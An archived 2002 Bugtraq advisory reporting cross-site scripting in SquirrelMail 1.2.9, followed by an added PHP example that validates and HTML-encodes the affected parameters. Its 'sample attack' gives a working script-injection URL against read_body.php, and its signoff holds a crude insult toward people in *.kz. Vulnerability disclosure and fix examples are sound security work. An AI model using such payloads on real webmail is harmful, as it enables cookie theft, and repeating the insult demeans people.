85919 2002-12-03 20:12 /46 lines/ euronymous <just-a-user@yandex.ru>
Imported: 2002-12-03 20:12 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vulnwatch@vulnwatch.org
External replies to: just-a-user@yandex.ru
Recipient: Bugtraq (import) <2629>
Subject: SquirrelMail v1.2.9 XSS bugs
------------------------------------------------------------
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: SquirrelMail v1.2.9 XSS bugs
product: SquirrelMail v1.2.9
vendor: www.squirrelmail.org
risk: low
date: 12/3/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/008.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

description
-----------

When reading an email you can insert scripting code. read_body.php
does not filter user input in the `mailbox' and `passed_id' variables.

BTW, v1.2.10 was released today. I don't know if this version
contains this XSS.

sample attack
-------------

http://hostname/src/read_body.php?mailbox=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&
startMessage=1&show_more=0

[it must be in a single string]

A string that is not URL-encoded also works fine.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet,
all russian security guyz!!
fuck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================
(85919) /euronymous <just-a-user@yandex.ru>/--------
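
One way a page such as read_body.php can handle the two parameters named in the advisory, as an added example (not SquirrelMail's code and not the fix the project shipped): `passed_id` is accepted only as a positive integer, and `mailbox` is bounded on input and HTML-encoded at output. The function names, the length limits and the link layout are assumptions of this example; it requires PHP 8.

```php
<?php
// Added example: hypothetical helpers, not SquirrelMail's own code. PHP 8+.
declare(strict_types=1);

/** Message ids are positive integers; everything else is rejected. */
function clean_passed_id(mixed $raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null; // arrays, empty strings, signs, markup, huge numbers
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/** Mailbox names are free text: bound them here, encode them at output. */
function clean_mailbox(mixed $raw): ?string
{
    // 255-byte limit and control-character ban are assumptions of this example.
    if (!is_string($raw) || $raw === '' || strlen($raw) > 255
        || preg_match('/[\x00-\x1f\x7f]/', $raw) === 1) {
        return null;
    }
    return $raw;
}

/** Encode for HTML text and quoted attribute values. */
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Echoes both request values back into a page, as a message view would. */
function message_nav(array $query): string
{
    $mailbox = clean_mailbox($query['mailbox'] ?? null);
    $id = clean_passed_id($query['passed_id'] ?? null);
    if ($mailbox === null || $id === null) {
        return '<p>Invalid request.</p>';
    }
    // Percent-encode for the URL first, then HTML-encode the attribute value.
    $href = 'read_body.php?' . http_build_query(['mailbox' => $mailbox, 'passed_id' => $id]);
    return sprintf('<a href="%s">%s</a> (message %d)', html($href), html($mailbox), $id);
}

// Constructed requests: markup in `mailbox`, then markup in `passed_id`.
$markup = '<script>alert(document.cookie)</script>';
echo message_nav(['mailbox' => $markup, 'passed_id' => '1']), "\n";
echo message_nav(['mailbox' => 'INBOX', 'passed_id' => $markup]), "\n";
```

The first call emits the markup as inert, entity-encoded text inside the link; the second is rejected because `passed_id` is not numeric.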